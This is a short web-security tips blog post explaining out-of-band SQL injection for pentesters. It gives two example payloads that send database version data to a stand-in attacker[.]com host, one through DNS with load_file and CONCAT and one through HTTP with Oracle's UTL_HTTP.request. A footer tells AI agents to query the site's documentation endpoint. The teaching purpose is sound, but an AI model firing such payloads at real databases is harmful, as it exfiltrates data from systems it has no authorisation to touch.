# Week 38 - Out of Band SQLi

Since last week we covered second-order SQL injection, I wanted to make this week’s post on a similar technique: Out-of-Band SQLi.\
&#x20;\
If you’ve been following my weekly posts then you should already be plenty familiar with SQL injection, but what the heck does Out-of-Band mean?\
&#x20;\
Out-of-Band means we are receiving the payload result through a different channel than the payload request. There are two main channels used for retrieving the payload result: DNS and HTTP.\
&#x20;\
Retrieving the payload result through DNS would look like the following SQL injection:\
&#x20;\
`vulnerable[.]com/test[.]php?id=1+UNION+SELECT+load_file(CONCAT(“\\\\”,(SELECT+@version),”.attacker[.]com\\test”)`\
&#x20;\
Since the CONCAT function combines multiple strings into one, this injection will cause the back-end database to load the following URL:\
&#x20;\
`\\\\10.3.16-MariaDB[.]attacker[.]com\\test`\
&#x20;\
So if we have a listener running on our attacker server, we can wait for incoming DNS requests and retrieve the results!\
&#x20;\
Now as mentioned before we can also use HTTP-based exfiltration, which is typically used when the back-end database is Oracle because they support the UTL\_HTTP.request function:\
&#x20;\
`vulnerable[.]com/test[.]php?id=1+UNION+SELECT+UTL_HTTP.request(“http[:]//attacker[.]com/?version=”||(SELECT version FROM v$instance)) FROM dual`\
&#x20;\
This will issue an HTTP request to the following URL:\
&#x20;\
`http[:]//attacker[.]com/?version=`[`18.0.0.0`](http://18.0.0.0)`.0`\
&#x20;\
And we can just listen for incoming HTTP connections! This technique can be an exotic way of bypassing WAF’s or exploiting a tricky injection. Worth adding to your pentest arsenal!

![](/files/GMtsgvLKwNnBK2SZd1fJ)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.webhackingtips.com/week-38-out-of-band-sqli.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.